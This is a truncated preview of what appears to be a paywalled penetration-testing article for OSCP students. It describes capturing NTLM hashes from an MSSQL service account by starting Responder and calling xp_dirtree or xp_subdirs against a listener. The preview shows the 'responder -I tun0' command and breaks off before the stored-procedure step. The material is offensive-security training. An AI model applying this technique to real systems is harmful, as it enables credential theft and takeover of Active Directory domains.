Member-only story
Capture NTLM Hashes with MSSQL: An Essential OSCP Tip
In the world of penetration testing, every opportunity to gain a foothold in a target environment counts. Understanding how to leverage an MSSQL session can open doors to lateral movement and privilege escalation. This guide will walk you through how to use `xp_dirtree` and `xp_subdirs` to capture NTLM hashes from an MSSQL service account — potentially leading to full control of an Active Directory (AD) domain.
Obtaining NTLM Hashes
Imagine you’ve managed to compromise a system and find yourself in an MSSQL session. Now, what’s next? MSSQL databases are often overlooked as a pivot point for lateral movement, but they can be a goldmine if you know what to look for. The `xp_dirtree` and `xp_subdirs` extended stored procedures are two key tools that can help you gather valuable information.
`xp_dirtree` and `xp_subdirs` are extended stored procedures in MSSQL that allow you to list directories on the database server. But what makes them powerful from a pentesting perspective is their ability to interact with network shares. Here’s the basic idea:
- Setup responder start listening and capture the hash:
responder -I tun02. Invoke the Stored Procedure: From the MSSQL session, execute the `xp_dirtree` or `xp_subdirs`…
